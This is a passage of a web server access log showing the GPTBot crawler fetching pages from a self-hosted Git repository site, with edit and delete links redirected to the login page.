"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" +[17/Feb/2026:17:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11899] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" +[17/Feb/2026:17:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11321] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" +[17/Feb/2026:17:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" +[17/Feb/2026:17:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12746] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:17:44:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:17:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:17:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 227529] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:17:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp" [Client 74.7.227.38] [Length 28367] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:17:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp" [Client 74.7.227.38] [Length 59098] [Gzip 11.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:17:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fTestApp" [Client 74.7.227.38] [Length 24184] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp" +[17/Feb/2026:17:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fMakefile" [Client 74.7.227.38] [Length 30849] [Gzip 6.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12033] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12033] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12032] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:44:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:17:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:17:44:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:17:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:17:44:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:17:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:17:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 9858] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:17:44:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:17:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:17:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:17:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html?display=source" [Client 74.7.227.38] [Length 227540] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:17:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:17:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:17:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 323599] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:17:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 347696] [Gzip 27.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:17:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10129] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:17:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:17:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp?display=source" [Client 74.7.227.38] [Length 14231] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:17:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11186] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:17:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:17:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp?display=source" [Client 74.7.227.38] [Length 17572] [Gzip 6.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:17:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11187] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:17:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:17:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:17:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9962] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:17:45:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:17:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:17:45:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:17:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:17:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&state=open&type=all" +[17/Feb/2026:17:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:17:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10314] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10321] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11596] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11601] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11602] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:45:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:45:11 +0000] - 200 200 - GET https 